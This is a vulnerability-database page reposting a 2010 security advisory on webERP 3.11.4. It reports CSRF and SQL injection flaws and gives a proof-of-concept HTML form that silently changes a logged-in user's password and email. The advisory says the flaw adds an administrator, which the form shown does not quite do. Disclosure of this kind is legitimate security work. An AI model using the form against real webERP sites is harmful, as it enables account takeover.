webERP 3.11.4 cross site request forgery.

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050506 漏洞类型
发布时间 2010-07-01 更新时间 2010-07-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070001
|漏洞详情
漏洞细节尚未披露
|漏洞EXP


# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor: http://www.weberp.org

# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it.There are on average 5,000 downloads per month."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
	- Mail: security[AT]adeo.com.tr
	- Web: http://security.adeo.com.tr

# Vulnerabilities:
1) CSRF: Attacker can add new administrator to the system. All files
have this issue. See #PoC section.
2) SQL Injection: Application offer disable the magic_quotes_gpc.
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP
Requests must filtered.

# PoC (CSRF):
<html>
<body>
<form method="POST" action="http://weberp.test/UserSettings.php?">
<input type="hidden" name="RealName" VALUE="ADEO-Security">
<input type='hidden' name='DisplayRecordsMax' VALUE="10">
<input type='hidden' name='Language' VALUE='en_US'>
<input type='hidden' name='Theme' VALUE='green'>
<input type='hidden' name='pass' value='adeopass'>
<input type='hidden' name='passcheck' value='adeopass'>
<input type='hidden' name='email' size=40 value='hacked@weberp.org'>
<input type='hidden' name='Modify' value="Modify""></div>
</form>

</body>
</html>